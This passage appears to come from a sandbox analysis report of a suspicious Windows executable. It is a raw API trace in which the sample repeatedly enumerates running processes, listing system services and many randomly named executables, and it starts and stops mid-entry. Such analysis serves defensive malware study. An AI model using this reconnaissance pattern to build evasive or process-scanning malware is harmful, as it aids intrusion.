Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xc40, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xc0c, pcPriClassBase=8, dwFlags=0x0, szExeFile="Sypykbck.exe")) returned 1 [0116.244] CloseHandle (hObject=0xbc) returned 1 [0116.244] Sleep (dwMilliseconds=0x12c) [0116.559] CreateToolhelp32Snapshot (dwFlags=0xf, th32ProcessID=0x0) returned 0xc4 [0116.565] Process32FirstW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0116.566] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x50, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, 
szExeFile="System")) returned 1 [0116.567] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0116.568] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0116.569] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x178, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0116.569] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x184, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0116.570] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0116.571] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0116.572] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, 
szExeFile="lsass.exe")) returned 1 [0116.573] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x178, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1 [0116.573] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x254, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0116.574] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x294, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0116.575] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x17, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0116.575] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x330, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x16, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0116.576] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x358, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2f, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0116.577] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x39c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x2c4, pcPriClassBase=8, dwFlags=0x0, 
szExeFile="audiodg.exe")) returned 1 [0116.577] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0116.578] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x43c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0116.579] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0116.580] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x19, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0116.581] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x540, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0116.583] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x58c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x358, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0116.584] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x598, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x330, pcPriClassBase=8, dwFlags=0x0, 
szExeFile="dwm.exe")) returned 1 [0116.585] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1e, th32ParentProcessID=0x584, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0116.587] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x61c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0116.588] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x50c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1d8, pcPriClassBase=6, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0116.589] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="fired-isolation-deny.exe")) returned 1 [0116.590] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x144, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="penguin weight doctrine.exe")) returned 1 [0116.592] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x49c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="requires bowling ireland.exe")) returned 1 [0116.593] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, 
th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="xplivecam.exe")) returned 1 [0116.594] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x180, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="kissingaerospace.exe")) returned 1 [0116.595] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x230, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="slopefirewall.exe")) returned 1 [0116.597] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x118, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="motors.exe")) returned 1 [0116.598] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x480, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="ins.exe")) returned 1 [0116.599] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x504, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="marble.exe")) returned 1 [0116.600] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="enlargement_zen_vb.exe")) returned 1 [0116.601] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x79c, th32DefaultHeapID=0x0, th32ModuleID=0x0, 
cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="manuals_z.exe")) returned 1 [0116.603] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x810, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="infant coins forced.exe")) returned 1 [0116.696] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x820, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="attend.exe")) returned 1 [0116.697] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x830, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="concerned.exe")) returned 1 [0116.699] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x840, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="sandwichtelevisions.exe")) returned 1 [0116.700] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x850, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="pickup.exe")) returned 1 [0116.702] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x860, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="athletics-americans.exe")) returned 1 [0116.703] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x870, 
th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="proudlydocumented.exe")) returned 1 [0116.705] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x880, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="ajbehaviord.exe")) returned 1 [0116.706] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x940, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1 [0116.707] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x960, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0116.709] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xaec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xacc, pcPriClassBase=8, dwFlags=0x0, szExeFile="XEY8d7zI.exe")) returned 1 [0116.710] CloseHandle (hObject=0xc4) returned 1 [0116.710] CreateToolhelp32Snapshot (dwFlags=0xf, th32ProcessID=0x0) returned 0xbc [0116.717] Process32FirstW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0116.717] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x50, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 
[0116.718] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0116.719] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0116.720] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x178, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0116.721] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x184, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0116.722] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0116.723] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0116.723] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0116.724] 
Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x178, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1 [0116.725] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x254, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0116.726] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x294, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0116.727] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x17, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0116.728] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x330, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x16, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0116.800] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x358, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2f, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0116.801] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x39c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x2c4, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0116.802] 
Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0116.802] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x43c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0116.803] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0116.804] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x18, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0116.805] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x540, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0116.806] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x58c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x358, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0116.807] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x598, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x330, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0116.809] 
Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1e, th32ParentProcessID=0x584, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0116.810] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x61c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0116.811] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x50c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1d8, pcPriClassBase=6, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0116.812] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="fired-isolation-deny.exe")) returned 1 [0116.813] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x144, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="penguin weight doctrine.exe")) returned 1 [0116.814] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x49c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="requires bowling ireland.exe")) returned 1 [0116.815] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, 
szExeFile="xplivecam.exe")) returned 1 [0116.817] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x180, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="kissingaerospace.exe")) returned 1 [0116.818] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x230, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="slopefirewall.exe")) returned 1 [0116.820] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x118, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, 